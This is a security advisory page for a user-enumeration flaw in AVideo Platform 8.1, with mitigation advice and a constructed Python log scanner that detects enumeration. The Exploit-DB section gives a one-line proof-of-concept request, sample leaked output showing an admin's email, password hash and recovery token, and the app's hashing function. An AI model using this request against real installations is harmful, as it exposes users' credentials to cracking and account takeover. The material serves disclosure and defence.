Vendor: AVideo Platform
By: Ihsan Sencan
CVSS: 5.3 (MEDIUM)
Information Disclosure (User Enumeration)
CWE: 200
Product Name: AVideo Platform
Affected Version From: 8.1
Affected Version To: 8.1
Patch Exists: NO
Related CWE:
CPE: a:avideo_platform:avideo:8.1
Metasploit:
Other Scripts:
Platforms Tested: Linux
2020

AVideo Platform 8.1 – Information Disclosure (User Enumeration)

AVideo Platform version 8.1 has an information disclosure vulnerability that allows an attacker to enumerate valid user accounts. By sending a GET request to the 'playlistsFromUser.json.php' endpoint with a valid 'users_id' parameter, an attacker can retrieve sensitive information such as user IDs, usernames, email addresses, hashed passwords, creation and modification timestamps, and other user details. The cause is insufficient access control on the endpoint, which lets unauthorized users read this information.

Mitigation:

To mitigate this vulnerability, implement proper access controls on the 'playlistsFromUser.json.php' endpoint so that only authorized users can access sensitive user information. Passwords should also be stored securely, using strong hashing algorithms and salted hashes. Regularly updating the AVideo Platform to the latest version is also recommended to ensure the latest security patches are applied.
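
Because the page lists no patch, operators may also want to spot enumeration of this endpoint in their web server logs. The following is an added example, not part of the original advisory or the AVideo code base; it assumes Combined Log Format access logs, and the sample lines, the /avideo/ path prefix and the threshold of 5 distinct IDs are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "playlistsFromUser.json.php"   # endpoint named in the advisory
# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*" \d{3} ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    f'203.0.113.7 - - [05/Feb/2020:10:00:{i:02d} +0000] '
    f'"GET /avideo/objects/playlistsFromUser.json.php?users_id={i} HTTP/1.1" 200 512'
    for i in range(1, 9)
] + [
    '198.51.100.20 - - [05/Feb/2020:10:01:00 +0000] '
    '"GET /avideo/objects/playlistsFromUser.json.php?users_id=92 HTTP/1.1" 200 498',
    '198.51.100.20 - - [05/Feb/2020:10:01:05 +0000] '
    '"GET /avideo/objects/playlistsFromUser.json.php?users_id=92 HTTP/1.1" 200 498',
    '198.51.100.20 - - [05/Feb/2020:10:01:09 +0000] '
    '"GET /avideo/view/img/logo.png HTTP/1.1" 200 2048',
]


def find_enumeration(lines, threshold=5):
    """Return {client_ip: sorted users_id values} for every client that asked
    the endpoint for at least `threshold` distinct users_id values.
    The threshold is an assumed starting point; tune it to normal traffic."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                      # not a parsable access-log line
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + ENDPOINT):
            continue                      # some other resource
        for value in parse_qs(url.query).get("users_id", []):
            if value.isdigit():
                seen[ip].add(int(value))
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= threshold}


if __name__ == "__main__":
    for ip, ids in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {len(ids)} distinct users_id values ({ids[0]}..{ids[-1]})")
```

A client that repeatedly requests the same users_id, as a normal page view might, stays below the threshold; only clients walking through many distinct IDs are reported.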

Exploit-DB raw data:

# Exploit Title: AVideo Platform 8.1 - Information Disclosure (User Enumeration)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
# 
................
0	
id	92
user	"admin"
name	"Watch Later"
email	"user@localhost"
password	"bc79a173cc20f0897db1c5b004588db9"
created	"2019-05-16 21:42:42"
modified	"2019-05-16 21:42:42"
isAdmin	1
status	"watch_later"
photoURL	"videos/userPhoto/photo1.png"
lastLogin	"2020-02-03 08:11:08"
recoverPass	"0ce70c7b006c78552fee993adeaafadf"
................
# 
# Hash function to be converted ....
# 
function encryptPassword($password, $noSalt = false) {
    global $advancedCustom, $global, $advancedCustomUser;
    if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
        $password .= $global['salt'];
    }

    return md5(hash("whirlpool", sha1($password)));
}
#